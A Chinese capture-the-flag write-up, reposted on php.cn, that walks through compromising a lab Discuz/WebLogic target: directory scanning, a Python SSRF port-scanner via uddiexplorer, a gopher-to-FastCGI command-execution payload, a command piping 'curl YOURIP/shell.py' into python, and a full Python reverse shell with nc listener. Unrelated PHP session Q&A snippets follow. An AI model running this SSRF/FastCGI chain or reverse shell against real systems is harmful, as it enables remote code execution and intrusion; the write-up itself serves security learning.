三个白帽-寻找来自星星的你-第一期-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

三个白帽-寻找来自星星的你-第一期

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 20, 2016 pm 12:26 PM

三個白帽-寻找来自星星的你 - 第一期

挑战介绍

来自星星的你被我给丢了，我可能需要用我所有的一切才能把你找回，编了两句就编不下去了，好吧，我承认这是一期渗透题，就是这么直接。

挑战目标

http://0761e975dda0c67cb.jie.sangebaimao.com/

0x01 信息收集

打開地址，是一個dz論壇。似乎不怎麼好玩啊，還是最新版本的。

既然是滲透了，感覺祭出大殺器“掃描目錄”！ （字典才是關鍵）

很快就get到關鍵信息了（排除dz原有的目錄及頁面）

/info.php/uddiexplorer/

一個是phpinfo()信息，很有用處的。

/opt/discuz/info.php

另一個是weblogic的東西。

果斷百度 "uddiexplorer 漏洞"，馬上可以知道 weblogic uddiexplorer存在 SSRF漏洞。

這次滲透的關鍵就在於 SSRF！！！

利用漏洞

SSRF並不只是搞內網，結合三個白帽的結界docker，搞127.0.0.1才是王道！

萬能的百度啊，搜索關鍵字 "SearchPublicRegistries ssrf 漏洞 exp"

得到http://www.tuicool.com/articles/UjaqIbz

得到一個腳本，自己修改一下拿來用！！！

端口掃描.py

#!/usr/bin/env python  # -*- coding: utf-8 -*- import reimport requestsdef scan(ip_str):    url = 'http://0761e975dda0c67cb.jie.sangebaimao.com'    ports = ('21','22','23','53','80','1080','1433','1521','3306','3389','4899','8080','7001','8000','9000','9001',)    for port in ports:        exp_url = url+"/uddiexplorer/SearchPublicRegistries.jsp?operator=http://%s:%s&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search"%(ip_str, port)        try:            response = requests.get(exp_url, timeout=15, verify=False)            re_sult1 = re.findall('weblogic.uddi.client.structures.exception.XML_SoapException',response.content)            re_sult2 = re.findall('but could not connect',response.content)            if len(re_sult1)!=0 and len(re_sult2)==0:                print ip_str+':'+port        except Exception, e:            passif __name__ == "__main__":    scan('127.0.0.1')

成功破出22，80，3306，7001，9000等端口。

SSRF+GOPHER一直都很牛逼，最近更是火熱。

還是百度~~

rr菊苣最新文章《Do Evil Things with gopher://》

0x03 攻击 FastCGI

一般来说 FastCGI 都是绑定在 127.0.0.1 端口上的，但是利用 Gopher+SSRF 可以完美攻击 FastCGI 执行任意命令。

0x06 参考

PHP FastCGI 的远程利用

命令執行

下載fcgi_exp

運行

nc -l -p 9000 >x.txt & go run fcgi_exp.go system 127.0.0.1 9000 /opt/discuz/info.php "curl YOURIP/shell.py|python"php -f gopher.php

把payload保存到x.txt

反彈shell的黑科技，bash反彈無效~~

然後urlencode編碼payload生成ssrf.php

shell.py

import socket,subprocess,os  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect(("yourip",9999))  os.dup2(s.fileno(),0)  os.dup2(s.fileno(),1)  os.dup2(s.fileno(),2)  p=subprocess.call(["/bin/bash","-i"]);

gopher.php

<?php$p = str_replace("+", "%20", urlencode(file_get_contents("x.txt")));file_put_contents("ssrf.php", "<?php header('Location: gopher://127.0.0.1:9000/_".$p."');?>");?>

成功生成了利用文件ssrf.php

反彈shell

VPS運行

nc -lvv 9999

利用SSRF

http://0761e975dda0c67cb.jie.sangebaimao.com/uddiexplorer/SearchPublicRegistries.jsp?&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%20location&btnSubmit=Search&operator=YOURIP/ssrf.php

成功反彈~~~

GETFLAG

自己找吧

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Explain how load balancing affects session management and how to address it.Apr 29, 2025 am 12:42 AM

Load balancing affects session management, but can be resolved with session replication, session stickiness, and centralized session storage. 1. Session Replication Copy session data between servers. 2. Session stickiness directs user requests to the same server. 3. Centralized session storage uses independent servers such as Redis to store session data to ensure data sharing.

Explain the concept of session locking.Apr 29, 2025 am 12:39 AM

Sessionlockingisatechniqueusedtoensureauser'ssessionremainsexclusivetooneuseratatime.Itiscrucialforpreventingdatacorruptionandsecuritybreachesinmulti-userapplications.Sessionlockingisimplementedusingserver-sidelockingmechanisms,suchasReentrantLockinJ

Are there any alternatives to PHP sessions?Apr 29, 2025 am 12:36 AM

Alternatives to PHP sessions include Cookies, Token-based Authentication, Database-based Sessions, and Redis/Memcached. 1.Cookies manage sessions by storing data on the client, which is simple but low in security. 2.Token-based Authentication uses tokens to verify users, which is highly secure but requires additional logic. 3.Database-basedSessions stores data in the database, which has good scalability but may affect performance. 4. Redis/Memcached uses distributed cache to improve performance and scalability, but requires additional matching

Define the term 'session hijacking' in the context of PHP.Apr 29, 2025 am 12:33 AM

Sessionhijacking refers to an attacker impersonating a user by obtaining the user's sessionID. Prevention methods include: 1) encrypting communication using HTTPS; 2) verifying the source of the sessionID; 3) using a secure sessionID generation algorithm; 4) regularly updating the sessionID.

What is the full form of PHP?Apr 28, 2025 pm 04:58 PM

The article discusses PHP, detailing its full form, main uses in web development, comparison with Python and Java, and its ease of learning for beginners.

How does PHP handle form data?Apr 28, 2025 pm 04:57 PM

PHP handles form data using $\_POST and $\_GET superglobals, with security ensured through validation, sanitization, and secure database interactions.

What is the difference between PHP and ASP.NET?Apr 28, 2025 pm 04:56 PM

The article compares PHP and ASP.NET, focusing on their suitability for large-scale web applications, performance differences, and security features. Both are viable for large projects, but PHP is open-source and platform-independent, while ASP.NET,

Is PHP a case-sensitive language?Apr 28, 2025 pm 04:55 PM

PHP's case sensitivity varies: functions are insensitive, while variables and classes are sensitive. Best practices include consistent naming and using case-insensitive functions for comparisons.

See all articles